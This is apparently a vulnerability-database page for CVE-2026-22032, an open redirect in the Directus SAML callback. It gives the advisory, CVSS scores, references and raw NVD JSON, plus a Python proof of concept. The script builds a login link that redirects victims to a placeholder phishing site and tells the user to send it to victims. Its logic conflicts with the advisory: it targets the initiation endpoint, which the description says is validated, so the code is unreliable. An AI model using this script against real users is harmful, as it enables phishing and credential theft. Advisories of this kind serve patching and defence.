CVE-2026-22032

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE

Directus < 11.14.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2026-22032 PoC - Directus SAML Open Redirect
# Target: Directus instance with SAML authentication enabled

def generate_malicious_saml_request(target_url, redirect_target):
    """
    Generate malicious SAML authentication request with open redirect
    
    Args:
        target_url: Base URL of vulnerable Directus instance
        redirect_target: Malicious URL to redirect victims to
    """
    # Construct the malicious SAML initiation URL
    # The RelayState parameter is not validated in the callback endpoint
    relay_state = urllib.parse.quote(redirect_target)
    
    # SAML login initiation endpoint
    saml_init_url = f"{target_url}/auth/saml/login?relay_state={relay_state}"
    
    return saml_init_url

def exploit_open_redirect(target_url, redirect_target):
    """
    Exploit the open redirect vulnerability
    
    This PoC demonstrates how an attacker can craft a malicious link
    that redirects users to an arbitrary URL after SAML authentication.
    """
    malicious_url = generate_malicious_saml_request(target_url, redirect_target)
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Malicious Redirect Target: {redirect_target}")
    print(f"[*] Generated Malicious URL: {malicious_url}")
    print(f"\n[!] Send this URL to victims to trigger the redirect")
    
    # The attack flow:
    # 1. Victim clicks the malicious URL
    # 2. User is redirected to IdP for authentication
    # 3. After authentication, callback endpoint receives response
    # 4. Without proper validation, RelayState is used for redirect
    # 5. Victim is redirected to attacker's controlled site
    
    return malicious_url

# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-directus.example.com"
    malicious_site = "https://evil-phishing-site.com/fake-login"
    
    exploit_open_redirect(target, malicious_site)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22032
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22032
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22032/
[4] VulDB https://vuldb.com/cve/CVE-2026-22032
[5] https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23
[6] https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22032", "sourceIdentifier": "[email protected]", "published": "2026-01-08T15:15:45.000", "lastModified": "2026-01-20T18:15:40.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch."}, {"lang": "es", "value": "Directus es un API en tiempo real y un panel de control de aplicaciones para gestionar contenido de base de datos SQL. Antes de la versión 11.14.0, existe una vulnerabilidad de redirección abierta en el endpoint de callback de autenticación SAML de Directus. Durante la autenticación SAML, el parámetro 'RelayState' está destinado a preservar el destino original del usuario. Sin embargo, mientras que el flujo de inicio de sesión valida los objetivos de redirección contra dominios permitidos, esta validación no se aplica al endpoint de callback. Esto permite a un atacante crear una solicitud de autenticación maliciosa que redirige a los usuarios a una URL externa arbitraria al finalizar. La vulnerabilidad está presente tanto en las rutas de manejo de éxito como de error del callback. Esta vulnerabilidad puede ser explotada sin autenticación. La versión 11.14.0 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.14.0", "matchCriteriaId": "DB17C72D-7DA6-4F3F-9642-454A8C3F77DE"}]}]}], "references": [{"url": "https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}